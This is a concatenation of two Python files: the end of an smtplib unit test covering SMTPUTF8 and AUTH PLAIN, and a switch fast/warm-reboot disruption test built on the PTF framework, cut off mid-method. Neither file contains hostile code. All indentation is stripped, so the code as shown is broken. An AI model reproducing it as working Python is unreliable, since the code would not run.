Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
oh là là, know what I mean, know what I mean?
""")
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
self.assertEqual(smtp.send_message(msg), {})
self.assertEqual(self.serv.last_mailfrom, 'főo@bar.com')
self.assertEqual(self.serv.last_rcpttos, ['Dinsdale'])
self.assertEqual(self.serv.last_message.decode(), expected)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
EXPECTED_RESPONSE = encode_base64(b'\0psu\0doesnotexist', eol='')
class SimSMTPAUTHInitialResponseChannel(SimSMTPChannel):
def smtp_AUTH(self, arg):
# RFC 4954's AUTH command allows for an optional initial-response.
# Not all AUTH methods support this; some require a challenge. AUTH
# PLAIN does those, so test that here. See issue #15014.
args = arg.split()
if args[0].lower() == 'plain':
if len(args) == 2:
# AUTH PLAIN <initial-response> with the response base 64
# encoded. Hard code the expected response for the test.
if args[1] == EXPECTED_RESPONSE:
self.push('235 Ok')
return
self.push('571 Bad authentication')
class SimSMTPAUTHInitialResponseServer(SimSMTPServer):
channel_class = SimSMTPAUTHInitialResponseChannel
class SMTPAUTHInitialResponseSimTests(unittest.TestCase):
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPAUTHInitialResponseServer(
(HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testAUTH_PLAIN_initial_response_login(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost', timeout=15)
smtp.login('psu', 'doesnotexist')
smtp.close()
def testAUTH_PLAIN_initial_response_auth(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost', timeout=15)
smtp.user = 'psu'
smtp.password = 'doesnotexist'
code, response = smtp.auth('plain', smtp.auth_plain)
smtp.close()
self.assertEqual(code, 235)
if __name__ == '__main__':
unittest.main()
|
advanced-reboot.py
|
#
# ptf --test-dir ptftests fast-reboot --qlen=1000 --platform remote -t 'verbose=True;dut_username="admin";dut_hostname="10.0.0.243";reboot_limit_in_seconds=30;portchannel_ports_file="/tmp/portchannel_interfaces.json";vlan_ports_file="/tmp/vlan_interfaces.json";ports_file="/tmp/ports.json";dut_mac="4c:76:25:f5:48:80";default_ip_range="192.168.0.0/16";vlan_ip_range="172.0.0.0/22";arista_vms="[\"10.0.0.200\",\"10.0.0.201\",\"10.0.0.202\",\"10.0.0.203\"]"' --platform-dir ptftests --disable-vxlan --disable-geneve --disable-erspan --disable-mpls --disable-nvgre
#
#
# This test checks that DUT is able to make FastReboot procedure
#
# This test supposes that fast-reboot/warm-reboot initiates by running /usr/bin/{fast,warm}-reboot command.
#
# The test uses "pings". The "pings" are packets which are sent through dataplane in two directions
# 1. From one of vlan interfaces to T1 device. The source ip, source interface, and destination IP are chosen randomly from valid choices. Number of packet is 100.
# 2. From all of portchannel ports to all of vlan ports. The source ip, source interface, and destination IP are chosed sequentially from valid choices.
# Currently we have 500 distrinct destination vlan addresses. Our target to have 1000 of them.
#
# The test sequence is following:
# 1. Check that DUT is stable. That means that "pings" work in both directions: from T1 to servers and from servers to T1.
# 2. If DUT is stable the test starts continiously pinging DUT in both directions.
# 3. The test runs '/usr/bin/{fast,warm}-reboot' on DUT remotely. The ssh key supposed to be uploaded by ansible before the test
# 4. As soon as it sees that ping starts failuring in one of directions the test registers a start of dataplace disruption
# 5. As soon as the test sees that pings start working for DUT in both directions it registers a stop of dataplane disruption
# 6. If the length of the disruption is less than 30 seconds (if not redefined by parameter) - the test passes
# 7. If there're any drops, when control plane is down - the test fails
# 8. When test start reboot procedure it connects to all VM (which emulates T1) and starts fetching status of BGP and LACP
# LACP is supposed to be down for one time only, if not - the test fails
# if default value of BGP graceful restart timeout is less than 120 seconds the test fails
# if BGP graceful restart is not enabled on DUT the test fails
# If BGP graceful restart timeout value is almost exceeded (less than 15 seconds) the test fails
# if BGP routes disappeares more then once, the test failed
#
# The test expects you're running the test with link state propagation helper.
# That helper propagate a link state from fanout switch port to corresponding VM port
#
import ptf
from ptf.base_tests import BaseTest
from ptf import config
import ptf.testutils as testutils
from ptf.testutils import *
from ptf.dataplane import match_exp_pkt
import datetime
import time
import subprocess
from ptf.mask import Mask
import socket
import ptf.packet as scapy
import thread
import threading
from multiprocessing.pool import ThreadPool, TimeoutError
import os
import signal
import random
import struct
import socket
from pprint import pprint
from fcntl import ioctl
import sys
import json
import re
from collections import defaultdict
import json
import Queue
import pickle
from operator import itemgetter
import scapy.all as scapyall
import itertools
from device_connection import DeviceConnection
import multiprocessing
from arista import Arista
import sad_path as sp
class StateMachine():
def __init__(self, init_state='init'):
self.state_lock = threading.RLock()
self.state_time = {} # Recording last time when entering a state
self.state = None
self.flooding = False
self.set(init_state)
def set(self, state):
with self.state_lock:
self.state = state
self.state_time[state] = datetime.datetime.now()
def get(self):
with self.state_lock:
cur_state = self.state
return cur_state
def get_state_time(self, state):
with self.state_lock:
time = self.state_time[state]
return time
def set_flooding(self, flooding):
with self.state_lock:
self.flooding = flooding
def is_flooding(self):
with self.state_lock:
flooding = self.flooding
return flooding
class ReloadTest(BaseTest):
TIMEOUT = 0.5
PKT_TOUT = 1
VLAN_BASE_MAC_PATTERN = '72060001{:04}'
LAG_BASE_MAC_PATTERN = '5c010203{:04}'
SOCKET_RECV_BUFFER_SIZE = 10 * 1024 * 1024
def __init__(self):
BaseTest.__init__(self)
self.fails = {}
self.info = {}
self.cli_info = {}
self.logs_info = {}
self.log_lock = threading.RLock()
self.vm_handle = None
self.sad_handle = None
self.process_id = str(os.getpid())
self.test_params = testutils.test_params_get()
self.check_param('verbose', False, required=False)
self.check_param('dut_username', '', required=True)
self.check_param('dut_password', '', required=True)
self.check_param('dut_hostname', '', required=True)
self.check_param('reboot_limit_in_seconds', 30, required=False)
self.check_param('reboot_type', 'fast-reboot', required=False)
self.check_param('graceful_limit', 240, required=False)
self.check_param('portchannel_ports_file', '', required=True)
self.check_param('vlan_ports_file', '', required=True)
self.check_param('ports_file', '', required=True)
self.check_param('dut_mac', '', required=True)
self.check_param('dut_vlan_ip', '', required=True)
self.check_param('default_ip_range', '', required=True)
self.check_param('vlan_ip_range', '', required=True)
self.check_param('lo_prefix', '10.1.0.32/32', required=False)
self.check_param('lo_v6_prefix', 'fc00:1::/64', required=False)
self.check_param('arista_vms', [], required=True)
self.check_param('min_bgp_gr_timeout', 15, required=False)
self.check_param('warm_up_timeout_secs', 300, required=False)
self.check_param('dut_stabilize_secs', 30, required=False)
self.check_param('preboot_files', None, required=False)
self.check_param('preboot_oper', None, required=False) # preboot sad path to inject before warm-reboot
self.check_param('inboot_oper', None, required=False) # sad path to inject during warm-reboot
self.check_param('nexthop_ips', [], required=False) # nexthops for the routes that will be added during warm-reboot
self.check_param('allow_vlan_flooding', False, required=False)
self.check_param('sniff_time_incr', 60, required=False)
self.check_param('vnet', False, required=False)
self.check_param('vnet_pkts', None, required=False)
self.check_param('target_version', '', required=False)
self.check_param('bgp_v4_v6_time_diff', 40, required=False)
if not self.test_params['preboot_oper'] or self.test_params['preboot_oper'] == 'None':
self.test_params['preboot_oper'] = None
if not self.test_params['inboot_oper'] or self.test_params['inboot_oper'] == 'None':
self.test_params['inboot_oper'] = None
# initialize sad oper
if self.test_params['preboot_oper']:
self.sad_oper = self.test_params['preboot_oper']
else:
self.sad_oper = self.test_params['inboot_oper']
if self.sad_oper:
self.log_file_name = '/tmp/%s-%s.log' % (self.test_params['reboot_type'], self.sad_oper)
self.report_file_name = '/tmp/%s-%s.json' % (self.test_params['reboot_type'], self.sad_oper)
else:
self.log_file_name = '/tmp/%s.log' % self.test_params['reboot_type']
self.report_file_name = '/tmp/%s-report.json' % self.test_params['reboot_type']
self.log_fp = open(self.log_file_name, 'w')
self.packets_list = []
self.vnet = self.test_params['vnet']
if (self.vnet):
self.packets_list = json.load(open(self.test_params['vnet_pkts']))
# a flag whether to populate FDB by sending traffic from simulated servers
# usually ARP responder will make switch populate its FDB table, but Mellanox on 201803 has
# no L3 ARP support, so this flag is used to W/A this issue
self.setup_fdb_before_test = self.test_params.get('setup_fdb_before_test', False)
# Default settings
self.ping_dut_pkts = 10
self.arp_ping_pkts = 1
self.nr_pc_pkts = 100
self.nr_tests = 3
self.reboot_delay = 10
self.task_timeout = 300 # Wait up to 5 minutes for tasks to complete
self.max_nr_vl_pkts = 500 # FIXME: should be 1000.
# But ptf is not fast enough + swss is slow for FDB and ARP entries insertions
self.timeout_thr = None
self.time_to_listen = 180.0 # Listen for more then 180 seconds, to be used in sniff_in_background method.
# Inter-packet interval, to be used in send_in_background method.
# Improve this interval to gain more precision of disruptions.
self.send_interval = 0.0035
self.packets_to_send = min(int(self.time_to_listen / (self.send_interval + 0.0015)), 45000) # How many packets to be sent in send_in_background method
# Thread pool for background watching operations
self.pool = ThreadPool(processes=3)
# State watcher attributes
self.watching = False
self.cpu_state = StateMachine('init')
self.asic_state = StateMachine('init')
self.vlan_state = StateMachine('init')
self.vlan_lock = threading.RLock()
self.asic_state_time = {} # Recording last asic state entering time
self.asic_vlan_reach = [] # Recording asic vlan reachability
self.recording = False # Knob for recording asic_vlan_reach
# light_probe:
# True : when one direction probe fails, don't probe another.
# False: when one direction probe fails, continue probe another.
self.light_probe = False
# We have two data plane traffic generators which are mutualy exclusive
# one is the reachability_watcher thread
# second is the fast send_in_background
self.dataplane_io_lock = threading.Lock()
self.allow_vlan_flooding = bool(self.test_params['allow_vlan_flooding'])
self.dut_connection = DeviceConnection(
self.test_params['dut_hostname'],
self.test_params['dut_username'],
password=self.test_params['dut_password'],
alt_password=self.test_params.get('alt_password')
)
# Check if platform type is kvm
stdout, stderr, return_code = self.dut_connection.execCommand("show platform summary | grep Platform | awk '{print $2}'")
platform_type = str(stdout[0]).replace('\n', '')
if platform_type == 'x86_64-kvm_x86_64-r0':
self.kvm_test = True
else:
self.kvm_test = False
return
def read_json(self, name):
with open(self.test_params[name]) as fp:
content = json.load(fp)
return content
def read_port_indices(self):
port_indices = self.read_json('ports_file')
return port_indices
def read_portchannel_ports(self):
content = self.read_json('portchannel_ports_file')
pc_ifaces = []
for pc in content.values():
pc_ifaces.extend([self.port_indices[member] for member in pc['members']])
return pc_ifaces
def read_vlan_ports(self):
content = self.read_json('vlan_ports_file')
if len(content) > 1:
raise Exception("Too many vlans")
return [self.port_indices[ifname] for ifname in content.values()[0]['members']]
def check_param(self, param, default, required = False):
if param not in self.test_params:
if required:
raise Exception("Test parameter '%s' is required" % param)
self.test_params[param] = default
def random_ip(self, ip):
net_addr, mask = ip.split('/')
n_hosts = 2**(32 - int(mask))
random_host = random.randint(2, n_hosts - 2)
return self.host_ip(ip, random_host)
def host_ip(self, net_ip, host_number):
src_addr, mask = net_ip.split('/')
n_hosts = 2**(32 - int(mask))
if host_number > (n_hosts - 2):
raise Exception("host number %d is greater than number of hosts %d in the network %s" % (host_number, n_hosts - 2, net_ip))
src_addr_n = struct.unpack(">I", socket.inet_aton(src_addr))[0]
net_addr_n = src_addr_n & (2**32 - n_hosts)
host_addr_n = net_addr_n + host_number
host_ip = socket.inet_ntoa(struct.pack(">I", host_addr_n))
return host_ip
def random_port(self, ports):
return random.choice(ports)
def log(self, message, verbose=False):
current_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
with self.log_lock:
if verbose and self.test_params['verbose'] or not verbose:
print "%s : %s" % (current_time, message)
self.log_fp.write("%s : %s\n" % (current_time, message))
self.log_fp.flush()
def timeout(self, func, seconds, message):
signal = multiprocessing.Event()
async_res = self.pool.apply_async(func, args=(signal,))
try:
res = async_res.get(timeout=seconds)
except Exception as err:
# TimeoutError and Exception's from func
# captured here
signal.set()
raise type(err)(message)
return res
def generate_vlan_servers(self):
vlan_host_map = defaultdict(dict)
vlan_ip_range = self.test_params['vlan_ip_range']
_, mask = vlan_ip_range.split('/')
n_hosts = min(2**(32 - int(mask)) - 3, self.max_nr_vl_pkts)
for counter, i in enumerate(xrange(2, n_hosts + 2)):
mac = self.VLAN_BASE_MAC_PATTERN.format(counter)
port = self.vlan_ports[i % len(self.vlan_ports)]
addr = self.host_ip(vlan_ip_range, i)
vlan_host_map[port][addr] = mac
self.nr_vl_pkts = n_hosts
return vlan_host_map
def generate_arp_responder_conf(self, vlan_host_map):
arp_responder_conf = {}
for port in vlan_host_map:
arp_responder_conf['eth{}'.format(port)] = vlan_host_map[port]
return arp_responder_conf
def dump_arp_responder_config(self, dump):
# save data for arp_replay process
filename = "/tmp/from_t1.json" if self.sad_oper is None else "/tmp/from_t1_%s.json" % self.sad_oper
with open(filename, "w") as fp:
json.dump(dump, fp)
def get_peer_dev_info(self):
content = self.read_json('peer_dev_info')
for key in content.keys():
if 'ARISTA' in key:
self.vm_dut_map[key] = dict()
self.vm_dut_map[key]['mgmt_addr'] = content[key]['mgmt_addr']
# initialize all the port mapping
self.vm_dut_map[key]['dut_ports'] = []
self.vm_dut_map[key]['neigh_ports'] = []
self.vm_dut_map[key]['ptf_ports'] = []
def get_portchannel_info(self):
content = self.read_json('portchannel_ports_file')
for key in content.keys():
for member in content[key]['members']:
for vm_key in self.vm_dut_map.keys():
if member in self.vm_dut_map[vm_key]['dut_ports']:
self.vm_dut_map[vm_key]['dut_portchannel'] = str(key)
self.vm_dut_map[vm_key]['neigh_portchannel'] = 'Port-Channel1'
break
def get_neigh_port_info(self):
content = self.read_json('neigh_port_info')
for key in content.keys():
if content[key]['name'] in self.vm_dut_map.keys():
self.vm_dut_map[content[key]['name']]['dut_ports'].append(str(key))
self.vm_dut_map[content[key]['name']]['neigh_ports'].append(str(content[key]['port']))
self.vm_dut_map[content[key]['name']]['ptf_ports'].append(self.port_indices[key])
def build_peer_mapping(self):
'''
Builds a map of the form
'ARISTA01T1': {'mgmt_addr':
'neigh_portchannel'
'dut_portchannel'
'neigh_ports'
'dut_ports'
'ptf_ports'
}
'''
self.vm_dut_map = {}
for file in self.test_params['preboot_files'].split(','):
self.test_params[file] = '/tmp/' + file + '.json'
self.get_peer_dev_info()
self.get_neigh_port_info()
self.get_portchannel_info()
def build_vlan_if_port_mapping(self):
content = self.read_json('vlan_ports_file')
if len(content) > 1:
raise Exception("Too many vlans")
return [(ifname, self.port_indices[ifname]) for ifname in content.values()[0]['members']]
def populate_fail_info(self, fails):
for key in fails:
if key not in self.fails:
self.fails[key] = set()
self.fails[key] |= fails[key]
def get_sad_info(self):
'''
Prepares the msg string to log when a sad_oper is defined. Sad oper can be a preboot or inboot oper
sad_oper can be represented in the following ways
eg. 'preboot_oper' - a single VM will be selected and preboot_oper will be applied to it
'neigh_bgp_down:2' - 2 VMs will be selected and preboot_oper will be applied to the selected 2 VMs
'neigh_lag_member_down:3:1' - this case is used for lag member down operation only. This indicates that
3 VMs will be selected and 1 of the lag members in the porchannel will be brought down
'inboot_oper' - represents a routing change during warm boot (add or del of multiple routes)
'routing_add:10' - adding 10 routes during warm boot
'''
msg = ''
if self.sad_oper:
msg = 'Sad oper: %s ' % self.sad_oper
if ':' in self.sad_oper:
oper_list = self.sad_oper.split(':')
msg = 'Sad oper: %s ' % oper_list[0] # extract the sad oper_type
if len(oper_list) > 2:
# extract the number of VMs and the number of LAG members. sad_oper will be of the form oper:no of VMS:no of lag members
msg += 'Number of sad path VMs: %s Lag member down in a portchannel: %s' % (oper_list[-2], oper_list[-1])
else:
# inboot oper
if 'routing' in self.sad_oper:
msg += 'Number of ip addresses: %s' % oper_list[-1]
else:
# extract the number of VMs. preboot_oper will be of the form oper:no of VMS
msg += 'Number of sad path VMs: %s' % oper_list[-1]
return msg
def init_sad_oper(self):
if self.sad_oper:
self.log("Preboot/Inboot Operations:")
self.sad_handle = sp.SadTest(self.sad_oper, self.ssh_targets, self.portchannel_ports, self.vm_dut_map, self.test_params, self.vlan_ports)
(self.ssh_targets, self.portchannel_ports, self.neigh_vm, self.vlan_ports), (log_info, fails) = self.sad_handle.setup()
self.populate_fail_info(fails)
for log in log_info:
self.log(log)
if self.sad_oper:
log_info, fails = self.sad_handle.verify()
self.populate_fail_info(fails)
for log in log_info:
self.log(log)
self.log(" ")
def do_inboot_oper(self):
'''
Add or del routes during boot
'''
if self.sad_oper and 'routing' in self.sad_oper:
self.log("Performing inboot operation")
log_info, fails = self.sad_handle.route_setup()
self.populate_fail_info(fails)
for log in log_info:
self.log(log)
self.log(" ")
def check_inboot_sad_status(self):
if 'routing_add' in self.sad_oper:
self.log('Verify if new routes added during warm reboot are received')
else:
self.log('Verify that routes deleted during warm reboot are removed')
log_info, fails = self.sad_handle.verify(pre_check=False, inboot=True)
self.populate_fail_info(fails)
for log in log_info:
self.log(log)
self.log(" ")
def check_postboot_sad_status(self):
self.log("Postboot checks:")
log_info, fails = self.sad_handle.verify(pre_check=False, inboot=False)
self.populate_fail_info(fails)
for log in log_info:
self.log(log)
self.log(" ")
def sad_revert(self):
self.log("Revert to preboot state:")
log_info, fails = self.sad_handle.revert()
self.populate_fail_info(fails)
for log in log_info:
self.log(log)
self.log(" ")
def setUp(self):
self.fails['dut'] = set()
self.port_indices = self.read_port_indices()
self.portchannel_ports = self.read_portchannel_ports()
self.vlan_ports = self.read_vlan_ports()
if self.sad_oper:
self.build_peer_mapping()
self.test_params['vlan_if_port'] = self.build_vlan_if_port_mapping()
self.vlan_ip_range = self.test_params['vlan_ip_range']
self.default_ip_range = self.test_params['default_ip_range']
self.limit = datetime.timedelta(seconds=self.test_params['reboot_limit_in_seconds'])
self.reboot_type = self.test_params['reboot_type']
if self.reboot_type not in ['fast-reboot', 'warm-reboot', 'warm-reboot -f']:
raise ValueError('Not supported reboot_type %s' % self.reboot_type)
self.dut_mac = self.test_params['dut_mac']
if self.kvm_test:
self.log("This test is for KVM platform")
# get VM info
if isinstance(self.test_params['arista_vms'], list):
arista_vms = self.test_params['arista_vms']
else:
arista_vms = self.test_params['arista_vms'][1:-1].split(",")
self.ssh_targets = []
for vm in arista_vms:
if (vm.startswith("'") or vm.startswith('"')) and (vm.endswith("'") or vm.endswith('"')):
self.ssh_targets.append(vm[1:-1])
else:
self.ssh_targets.append(vm)
self.log("Converted addresses VMs: %s" % str(self.ssh_targets))
self.init_sad_oper()
self.vlan_host_map = self.generate_vlan_servers()
arp_responder_conf = self.generate_arp_responder_conf(self.vlan_host_map)
self.dump_arp_responder_config(arp_responder_conf)
self.random_vlan = random.choice(self.vlan_ports)
self.from_server_src_port = self.random_vlan
self.from_server_src_addr = random.choice(self.vlan_host_map[self.random_vlan].keys())
self.from_server_dst_addr = self.random_ip(self.test_params['default_ip_range'])
self.from_server_dst_ports = self.portchannel_ports
self.log("Test params:")
self.log("DUT ssh: %s@%s" % (self.test_params['dut_username'], self.test_params['dut_hostname']))
self.log("DUT reboot limit in seconds: %s" % self.limit)
self.log("DUT mac address: %s" % self.dut_mac)
self.log("From server src addr: %s" % self.from_server_src_addr)
self.log("From server src port: %s" % self.from_server_src_port)
self.log("From server dst addr: %s" % self.from_server_dst_addr)
self.log("From server dst ports: %s" % self.from_server_dst_ports)
self.log("From upper layer number of packets: %d" % self.nr_vl_pkts)
self.log("VMs: %s" % str(self.test_params['arista_vms']))
self.log("Reboot type is %s" % self.reboot_type)
self.generate_from_t1()
self.generate_from_vlan()
self.generate_ping_dut_lo()
self.generate_arp_ping_packet()
if 'warm-reboot' in self.reboot_type:
self.log(self.get_sad_info())
# Pre-generate list of packets to be sent in send_in_background method.
generate_start = datetime.datetime.now()
if not self.vnet:
self.generate_bidirectional()
self.log("%d packets are ready after: %s" % (len(self.packets_list), str(datetime.datetime.now() - generate_start)))
self.dataplane = ptf.dataplane_instance
for p in self.dataplane.ports.values():
port = p.get_packet_source()
port.socket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, self.SOCKET_RECV_BUFFER_SIZE)
self.dataplane.flush()
if config["log_dir"] != None:
filename = os.path.join(config["log_dir"], str(self)) + ".pcap"
self.dataplane.start_pcap(filename)
self.log("Enabling arp_responder")
self.cmd(["supervisorctl", "restart", "arp_responder"])
return
def setup_fdb(self):
""" simulate traffic generated from servers to help populate FDB """
vlan_map = self.vlan_host_map
from_servers_pkt = testutils.simple_tcp_packet(
eth_dst=self.dut_mac,
ip_dst=self.from_server_dst_addr,
)
for port in vlan_map:
for addr in vlan_map[port]:
mac = vlan_map[port][addr]
from_servers_pkt[scapy.Ether].src = self.hex_to_mac(mac)
from_servers_pkt[scapy.IP].src = addr
testutils.send(self, port, from_servers_pkt)
# make sure orchagent processed new FDBs
time.sleep(1)
def tearDown(self):
self.log("Disabling arp_responder")
self.cmd(["supervisorctl", "stop", "arp_responder"])
# Stop watching DUT
self.watching = False
if config["log_dir"] != None:
self.dataplane.stop_pcap()
self.log_fp.close()
def get_if(self, iff, cmd):
s = socket.socket()
ifreq = ioctl(s, cmd, struct.pack("16s16x",iff))
s.close()
return ifreq
@staticmethod
def hex_to_mac(hex_mac):
return ':'.join(hex_mac[i:i+2] for i in range(0, len(hex_mac), 2))
def generate_from_t1(self):
self.from_t1 = []
# for each server host create a packet destinating server IP
for counter, host_port in enumerate(self.vlan_host_map):
src_addr = self.random_ip(self.default_ip_range)
src_port = self.random_port(self.portchannel_ports)
for server_ip in self.vlan_host_map[host_port]:
dst_addr = server_ip
# generate source MAC address for traffic based on LAG_BASE_MAC_PATTERN
mac_addr = self.hex_to_mac(self.LAG_BASE_MAC_PATTERN.format(counter))
packet = simple_tcp_packet(eth_src=mac_addr,
eth_dst=self.dut_mac,
ip_src=src_addr,
ip_dst=dst_addr,
ip_ttl=255,
tcp_dport=5000)
self.from_t1.append((src_port, str(packet)))
# expect any packet with dport 5000
exp_packet = simple_tcp_packet(
ip_src="0.0.0.0",
ip_dst="0.0.0.0",
tcp_dport=5000,
)
self.from_t1_exp_packet = Mask(exp_packet)
self.from_t1_exp_packet.set_do_not_care_scapy(scapy.Ether, "src")
self.from_t1_exp_packet.set_do_not_care_scapy(scapy.Ether, "dst")
self.from_t1_exp_packet.set_do_not_care_scapy(scapy.IP, "src")
self.from_t1_exp_packet.set_do_not_care_scapy(scapy.IP, "dst")
self.from_t1_exp_packet.set_do_not_care_scapy(scapy.IP, "chksum")
self.from_t1_exp_packet.set_do_not_care_scapy(scapy.TCP, "chksum")
self.from_t1_exp_packet.set_do_not_care_scapy(scapy.IP, "ttl")
def generate_from_vlan(self):
packet = simple_tcp_packet(
eth_dst=self.dut_mac,
ip_src=self.from_server_src_addr,
ip_dst=self.from_server_dst_addr,
tcp_dport=5000
)
exp_packet = simple_tcp_packet(
ip_src=self.from_server_src_addr,
ip_dst=self.from_server_dst_addr,
ip_ttl=63,
tcp_dport=5000,
)
self.from_vlan_exp_packet = Mask(exp_packet)
self.from_vlan_exp_packet.set_do_not_care_scapy(scapy.Ether, "src")
self.from_vlan_exp_packet.set_do_not_care_scapy(scapy.Ether, "dst")
self.from_vlan_packet = str(packet)
def generate_ping_dut_lo(self):
dut_lo_ipv4 = self.test_params['lo_prefix'].split('/')[0]
packet = simple_icmp_packet(eth_dst=self.dut_mac,
ip_src=self.from_server_src_addr,
ip_dst=dut_lo_ipv4)
exp_packet = simple_icmp_packet(eth_src=self.dut_mac,
ip_src=dut_lo_ipv4,
ip_dst=self.from_server_src_addr,
icmp_type='echo-reply')
self.ping_dut_exp_packet = Mask(exp_packet)
self.ping_dut_exp_packet.set_do_not_care_scapy(scapy.Ether, "dst")
self.ping_dut_exp_packet.set_do_not_care_scapy(scapy.IP, "id")
self.ping_dut_exp_packet.set_do_not_care_scapy(scapy.IP, "chksum")
self.ping_dut_packet = str(packet)
def generate_arp_ping_packet(self):
vlan_ip_range = self.test_params['vlan_ip_range']
vlan_port_canadiates = range(len(self.vlan_ports))
vlan_port_canadiates.remove(0) # subnet prefix
vlan_port_canadiates.remove(1) # subnet IP on dut
src_idx = random.choice(vlan_port_canadiates)
vlan_port_canadiates.remove(src_idx)
dst_idx = random.choice(vlan_port_canadiates)
src_port = self.vlan_ports[src_idx]
dst_port = self.vlan_ports[dst_idx]
src_addr = self.host_ip(vlan_ip_range, src_idx)
dst_addr = self.host_ip(vlan_ip_range, dst_idx)
src_mac = self.hex_to_mac(self.vlan_host_map[src_port][src_addr])
packet = simple_arp_packet(eth_src=src_mac, arp_op=1, ip_snd=src_addr, ip_tgt=dst_addr, hw_snd=src_mac)
expect = simple_arp_packet(eth_dst=src_mac, arp_op=2, ip_snd=dst_addr, ip_tgt=src_addr, hw_tgt=src_mac)
self.log("ARP ping: src idx %d port %d mac %s addr %s" % (src_idx, src_port, src_mac, src_addr))
self.log("ARP ping: dst idx %d port %d addr %s" % (dst_idx, dst_port, dst_addr))
self.arp_ping = str(packet)
self.arp_resp = Mask(expect)
self.arp_resp.set_do_not_care_scapy(scapy.Ether, 'src')
self.arp_resp.set_do_not_care_scapy(scapy.ARP, 'hwtype')
self.arp_resp.set_do_not_care_scapy(scapy.ARP, 'hwsrc')
self.arp_src_port = src_port
def generate_bidirectional(self):
"""
This method is used to pre-generate packets to be sent in background thread.
Packets are composed into a list, and present a bidirectional flow as next:
five packet from T1, one packet from vlan.
Each packet has sequential TCP Payload - to be identified later.
"""
self.send_interval = self.time_to_listen / self.packets_to_send
self.packets_list = []
from_t1_iter = itertools.cycle(self.from_t1)
for i in xrange(self.packets_to_send):
payload = '0' * 60 + str(i)
if (i % 5) == 0 : # From vlan to T1.
packet = scapyall.Ether(self.from_vlan_packet)
packet.load = payload
from_port = self.from_server_src_port
else: # From T1 to vlan.
src_port, packet = next(from_t1_iter)
packet = scapyall.Ether(packet)
packet.load = payload
from_port = src_port
self.packets_list.append((from_port, str(packet)))
def put_nowait(self, queue, data):
try:
queue.put_nowait(data)
except Queue.Full:
pass
def pre_reboot_test_setup(self):
self.reboot_start = None
self.no_routing_start = None
self.no_routing_stop = None
self.no_cp_replies = None
self.upper_replies = []
self.routing_always = False
self.ssh_jobs = []
for addr in self.ssh_targets:
q = Queue.Queue(1)
thr = threading.Thread(target=self.peer_state_check, kwargs={'ip': addr, 'queue': q})
thr.setDaemon(True)
self.ssh_jobs.append((thr, q))
thr.start()
if self.setup_fdb_before_test:
self.log("Run some server traffic to populate FDB table...")
self.setup_fdb()
self.log("Starting reachability state watch thread...")
self.watching = True
self.light_probe = False
self.watcher_is_stopped = threading.Event() # Waiter Event for the Watcher state is stopped.
self.watcher_is_running = threading.Event() # Waiter Event for the Watcher state is running.
self.watcher_is_stopped.set() # By default the Watcher is not running.
self.watcher_is_running.clear() # By default its required to wait for the Watcher started.
# Give watch thread some time to wind up
watcher = self.pool.apply_async(self.reachability_watcher)
time.sleep(5)
def get_warmboot_finalizer_state(self):
stdout, stderr, _ = self.dut_connection.execCommand('sudo systemctl is-active warmboot-finalizer.service')
if not stdout:
self.log('Finalizer state not returned from DUT')
return ''
if stderr:
self.fails['dut'].add("stderr from DUT while collecting Finalizer state: %s" % (str(stderr)))
finalizer_state = stdout[0].strip()
return finalizer_state
def get_now_time(self):
stdout, stderr, _ = self.dut_connection.execCommand('date +"%Y-%m-%d %H:%M:%S"')
if not stdout:
self.fails['dut'].add('Error collecting current date from DUT: empty value returned')
raise Exception('Error collecting current date from DUT: empty value returned')
if stderr:
self.fails['dut'].add("Error collecting current date from DUT: %s" % (str(stderr)))
raise Exception('Error collecting current date from DUT: empty value returned')
return datetime.datetime.strptime(stdout[0].strip(), "%Y-%m-%d %H:%M:%S")
def check_warmboot_finalizer(self):
dut_datetime = self.get_now_time()
self.log('waiting for warmboot-finalizer service to become activating')
finalizer_state = self.get_warmboot_finalizer_state()
warm_up_timeout_secs = int(self.test_params['warm_up_timeout_secs'])
finalizer_timeout = 60 + self.test_params['reboot_limit_in_seconds']
while finalizer_state != 'activating':
dut_datetime_after_ssh = self.get_now_time()
time_passed = float(dut_datetime_after_ssh.strftime("%s")) - float(dut_datetime.strftime("%s"))
if time_passed > finalizer_timeout:
self.fails['dut'].add('warmboot-finalizer never reached state "activating"')
raise TimeoutError
time.sleep(1)
finalizer_state = self.get_warmboot_finalizer_state()
self.log('waiting for warmboot-finalizer service to finish')
finalizer_state = self.get_warmboot_finalizer_state()
self.log('warmboot finalizer service state {}'.format(finalizer_state))
count = 0
while finalizer_state == 'activating':
finalizer_state = self.get_warmboot_finalizer_state()
self.log('warmboot finalizer service state {}'.format(finalizer_state))
time.sleep(10)
if count * 10 > warm_up_timeout_secs:
self.fails['dut'].add('warmboot-finalizer.service did not finish')
raise TimeoutError
count += 1
self.log('warmboot-finalizer service finished')
def wait_until_reboot(self):
self.log("Wait until Control plane is down")
self.timeout(self.wait_until_cpu_port_down, self.task_timeout, "DUT hasn't shutdown in {} seconds".format(self.task_timeout))
if self.reboot_type == 'fast-reboot':
self.light_probe = True
else:
# add or del routes during boot
self.do_inboot_oper()
self.reboot_start = datetime.datetime.now()
self.log("Dut reboots: reboot start %s" % str(self.reboot_start))
